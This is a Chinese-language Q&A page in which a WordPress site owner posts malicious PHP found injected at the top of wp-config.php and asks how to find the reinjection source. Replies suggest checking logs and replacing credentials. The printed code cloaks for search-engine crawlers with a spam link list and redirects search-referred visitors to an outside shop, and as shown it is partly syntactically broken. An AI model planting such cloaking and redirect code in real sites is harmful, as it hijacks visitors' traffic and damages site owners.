1. 首頁
  2. 問答
  3. 如何追蹤正在注入到wp-config.php中的頭部重定向

如何追蹤正在注入到wp-config.php中的頭部重定向

2016-03-07 45 views
-4

我將代碼注入到我的某個網站中。我找不到罪魁禍首。我下載了網站與BackupBuddy,而事實證明,注入代碼,這是如下:如何追蹤正在注入到wp-config.php中的頭部重定向

<?php 

    $referer = $_SERVER['HTTP_REFERER']; 
    $user_agent = $_SERVER['HTTP_USER_AGENT']; 

    $tmp = strtolower($_SERVER['HTTP_USER_AGENT']); 

    if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'bing') !== false || 

    strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) { 




    cheongsam dress => "http://www.cozyladywear.com/qipao-cheongsam-c-87.html", 
    cheongsam dresses => "http://www.goodorient.com/Dresses_C115", 
    cheongsam style dress => "https://www.pinterest.com/explore/cheongsam-modern/", 
    cheongsam dress pattern => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/", 
    dress cheongsam => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/", 
    cheongsam dresses for sale => "http://modernqipao.com/", 
    red cheongsam dress => "http://redchinesedress.com/product-category/cheongsam-qipao/", 
    black cheongsam dress => "https://www.etsy.com/market/black_cheongsam", 
    cheongsam evening dress => "http://yannyexpress.com/collections/wedding-qipao-cheongsam", 
    cheongsam dress for sale => "http://www.dresswe.com/cheongsam-dresses-103948/", 
    short cheongsam dresses => "http://www.elegente.com/short-cheongsam", 
    cheongsam inspired dresses => "https://www.pinterest.com/friedwontons4u/the-modern-girls-guide-to-cheongsamqipao/", 
    lace cheongsam dress => "http://modernqipao.com/product-category/material/lace/", 
    silk cheongsam dress => "http://www.efushop.com/index.php/goods/category/Silk-Brocade-cheongsam", 
    vintage cheongsam dress => "https://www.etsy.com/market/vintage_cheongsam", 
    blue cheongsam dress => "http://modernqipao.com/product-tag/blue/", 
    purple cheongsam dress => "http://modernqipao.com/product-tag/purple-lavender-color/", 
    white cheongsam dress => "https://www.pinterest.com/explore/cheongsam-wedding/", 
    cotton cheongsam dress => "http://www.efushop.com/index.php/goods/category/Cotton-cheongsam", 
    cheongsam dress sewing pattern => "http://vintagepatterns.wikia.com/wiki/Category:Cheongsam", 
    cheongsam prom dress => "http://www.cozyladywear.com/fuchsia-fishtail-cheongsam-qipao-chinese-wedding-prom-dress-p-611.html", 
    cheongsam inspired dress => "https://www.etsy.com/market/qipao", 
    gold cheongsam dress => "http://modernqipao.com/product/gold-circled-lace-modern-mini-qipao-sexy-chinese-cheongsam-dress/", 
    cheongsam dinner dress => "https://www.pinterest.com/yannyexpress/wedding-qipao-cheongsam-bridal-kwa-qun-couture-eve/", 
    cheongsam bridesmaid dresses => "https://www.pinterest.com/explore/chinese-wedding-dresses/", 
    pink cheongsam dress => "http://modernqipao.com/product-tag/pink-peach-champagne/", 
    cheongsam short dress => "https://www.pinterest.com/cozyladywear/qipao-cheongsam/", 
    hot cheongsam dress => "http://www.idreammart.com/chinese-dresses/2015-hot-cheongsam-chinese-dresses.html", 
    cheongsam dresses uk => "http://www.kaiizhang.co.uk/", 
    chinese traditional dress => "https://en.wikipedia.org/wiki/Chinese_clothing", 
    traditional chinese dress => "http://www.travelchinaguide.com/intro/clothing/", 
    traditional chinese dresses => "http://www.chinatoday.com/culture/qipao/qipao.htm", 
    chinese dress traditional => "https://en.wikipedia.org/wiki/Cheongsam", 


    ); 

      exit; 
    } 
    // 
    $from_search_engine = false; 
    $jump_referer = array('google','bing','yahoo','msn','ask','yandex','aol'); 
    foreach($jump_referer as $ref){ 
     $ref_rst = stripos($referer,$ref); 
     if($ref_rst > -1){ 
      $from_search_engine=true; 
      break; 
     } 
    } 

    if($from_search_engine){ 
     header("Location: http://www.acc2buy.com/"); 
     exit; 
    } 
    ?>

此代碼是在WP-config.php文件的最頂端 - 但是,當我通過FTP登錄,該代碼不在那裏。所以它會重定向所有嘗試通過搜索引擎進入的用戶。

我該如何去追蹤實際的注入文件?我已經GREPped一切,尋找任何引用wp-config.php。

我也開始使用index.php,並通過wp-blog-head.php和wp-load.php工作 - 我似乎無法找到它的前置位置。

在此先感謝你們!

來源

2016-03-07 Jared Codling

+0

只是想給我可以儘可能多的信息 - 我通讀該代碼,它非常簡單。我已經能夠刪除黑客。但我正在努力尋找現在如何再生。 –

+0

您的WP插件或WP本身可能存在一些安全漏洞(如果它是舊版本)。您必須刪除「hack」,並觀察Apache中的訪問日誌和錯誤日誌,以瞭解漏洞的位置。聽起來像是有人發現了利用您的網站的方式,他們會繼續這樣做,直到您解決違規問題 – Farside

回答

0

我已經檢查了您的問題,做一件事剛剛拉上此文件的備份和更改主機,用戶名和密碼

一些時間,同時在cPanel中查看代碼,這樣的代碼沒有顯示後刪除現有文件最好的辦法是修改後上傳新文件並刪除舊

希望得到您的解決方案 隨意問任何惡意軟件相關的查詢:)

來源

2016-03-22 05:37:34

相關問題

 相關問題